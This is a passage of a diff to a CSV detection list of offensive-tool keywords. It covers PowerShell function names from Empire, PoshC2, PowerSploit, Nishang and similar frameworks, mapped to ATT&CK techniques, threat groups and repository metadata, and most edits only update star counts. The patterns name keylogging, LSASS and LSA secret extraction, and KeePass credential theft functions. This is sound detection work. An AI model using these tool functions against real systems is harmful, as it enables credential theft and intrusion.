TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*get-killdate*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Get-KeePassINIFields*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-KeePassXMLFields*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-KeystrokeData*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Get-Keystrokes *","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-Keystrokes*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1067","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*get-keystrokes*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"*Get-Keystrokes*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*Get-Killdate*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1050","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*get-killdate*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","1","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "*Get-KIWI_KERBEROS_LOGON_SESSION*","offensive_tool_keyword","powerextract","This tool is able to parse memory dumps of the LSASS process without any additional tools (e.g. Debuggers) or additional sideloading of mimikatz. It is a pure PowerShell implementation for parsing and extracting secrets (LSA / MSV and Kerberos) of the LSASS process","T1003 - T1055 - T1003.001 - T1055.012","TA0007 - TA0002","N/A","N/A","Credential Access","https://github.com/powerseb/PowerExtract","1","0","N/A","N/A","1","99","14","2023-07-19T14:24:41Z","2021-12-11T15:24:44Z" -"*Get-LastLoggedon -*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-LastLoggedOn*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*getLocalAdm*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","641","85","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" -"*Get-LoggedOnLocal -*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-LastLoggedon -*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*Get-LastLoggedOn*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*getLocalAdm*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*Get-LoggedOnLocal -*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-LsaRunAsPPLStatus*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" -"*Get-LSASecret*","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","7849","2360","2023-09-05T07:54:08Z","2014-05-19T11:48:24Z" -"*Get-ModifiableRegistryAutoRun*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-ModifiableRegistryAutoRun*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Get-ModifiableScheduledTaskFile*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-ModifiableScheduledTaskFile*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Get-ModifiableService*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Get-NetComputer -Unconstrainuser*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Get-NetDomainController*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*Get-NetDomainTrust*","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*get-netfileserver -domain *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"*Get-NetFileServer*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - 